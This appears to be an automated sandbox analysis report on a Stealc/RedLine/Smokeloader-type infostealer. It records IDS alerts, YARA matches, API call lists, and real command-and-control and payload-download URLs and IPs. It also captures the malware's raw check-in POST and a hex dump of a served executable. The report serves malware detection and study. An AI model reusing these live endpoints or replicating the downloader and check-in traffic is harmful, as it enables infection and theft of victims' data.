Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024FE597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_024FE597

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49738 -> 92.255.57.89:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://92.255.57.89/45c616e921a794b8.php

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 23:02:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 23:00:02 GMTETag: "4a800-628f270ec78e7"Accept-Ranges: bytesContent-Length: 305152Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f4 9d 40 24 a7 9d 40 24 a7 9d 40 24 a7 83 12 a0 a7 81 40 24 a7 83 12 b1 a7 89 40 24 a7 83 12 a7 a7 c5 40 24 a7 ba 86 5f a7 94 40 24 a7 9d 40 25 a7 f7 40 24 a7 83 12 ae a7 9c 40 24 a7 83 12 b0 a7 9c 40 24 a7 83 12 b5 a7 9c 40 24 a7 52 69 63 68 9d 40 24 a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 25 df 7d 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f2 02 00 00 24 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 42 00 00 04 00 00 e1 2d 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 27 03 00 50 00 00 00 00 00 41 00 10 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec f0 02 00 00 10 00 00 00 f2 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 20 00 00 00 10 03 00 00 22 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 b0 3d 00 00 40 03 00 00 6c 00 00 00 18 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 22 01 00 00 00 41 00 00 24 01 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 92.255.57.89Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 39 35 39 41 43 33 44 43 38 34 45 37 35 38 38 30 39 30 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="hwid"1959AC3DC84E758809014------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="build"default------ECGDHDHJEBGHJKFIECBG--

Source: Joe Sandbox View	IP Address: 172.67.179.207 172.67.179.207
Source: Joe Sandbox View	IP Address: 92.255.57.89 92.255.57.89

Source: Joe Sandbox View

ASN Name: TELSPRU TELSPRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 172.67.179.207:443

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: post-to-me.com

Source: unknown

HTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 92.255.57.89Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 39 35 39 41 43 33 44 43 38 34 45 37 35 38 38 30 39 30 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="hwid"1959AC3DC84E758809014------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="build"default------ECGDHDHJEBGHJKFIECBG--

Source: EbXj93v3bO.exe, 00000000.00000003.1721342973.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/
Source: EbXj93v3bO.exe, EbXj93v3bO.exe, 00000000.00000003.1721342973.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000002.4104042271.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973809946.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000002.4104153786.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973871075.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: EbXj93v3bO.exe, 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: EbXj93v3bO.exe, 00000000.00000003.1721342973.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973809946.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000002.4104153786.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973871075.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe6
Source: EbXj93v3bO.exe, 00000000.00000003.1721342973.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exev
Source: EbXj93v3bO.exe, 00000000.00000003.1721342973.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exex
Source: BB02.tmp.exe, 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmp, BB02.tmp.exe, 00000001.00000002.2071351064.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, BB02.tmp.exe, 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmp, BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, BB02.tmp.exe, 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmp, BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php4
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php658(v
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpl
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phplL
Source: BB02.tmp.exe, 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpwininit.exe
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dll
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllll
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllv
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/ew
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/lw
Source: BB02.tmp.exe, 00000001.00000002.2071351064.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89:
Source: BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89A
Source: BB02.tmp.exe, 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89FIECBG
Source: BB02.tmp.exe, 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89smss.exe
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: EbXj93v3bO.exe, 00000000.00000002.4104095263.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973809946.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: EbXj93v3bO.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: EbXj93v3bO.exe, 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: EbXj93v3bO.exe, 00000000.00000002.4104095263.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000002.4104042271.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973809946.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE

Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735

Source: unknown

HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49735 version: TLS 1.2

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02511942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_02511942

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

0_2_004016DF

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Code function: 1_2_00409876 CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,

1_2_00409876

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.4104016383.0000000000B3E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.2071390992.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02512361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_02512361
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02512605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_02512605

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02538289	0_2_02538289
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0253ED47	0_2_0253ED47
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02524172	0_2_02524172
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_025376EB	0_2_025376EB
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0253D755	0_2_0253D755
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_025387C7	0_2_025387C7
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02537A5D	0_2_02537A5D
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0251EBDB	0_2_0251EBDB
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02526916	0_2_02526916
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0252398C	0_2_0252398C
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02546F26	0_2_02546F26
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02537FCE	0_2_02537FCE
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0253ED47	0_2_0253ED47
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02528D16	0_2_02528D16
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02537D07	0_2_02537D07
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_02504B37	1_2_02504B37

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: String function: 00410720 appears 52 times
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: String function: 02520019 appears 119 times
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: String function: 0040FDB2 appears 123 times
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: String function: 02520987 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: String function: 00404980 appears 317 times

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7928 -s 1292

Source: EbXj93v3bO.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: BB02.tmp.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: EbXj93v3bO.exe	Binary or memory string: OriginalFileName vs EbXj93v3bO.exe
Source: EbXj93v3bO.exe, 00000000.00000003.1668545398.0000000002580000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs EbXj93v3bO.exe
Source: EbXj93v3bO.exe, 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs EbXj93v3bO.exe
Source: EbXj93v3bO.exe, 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs EbXj93v3bO.exe

Source: EbXj93v3bO.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.4104016383.0000000000B3E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.2071390992.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
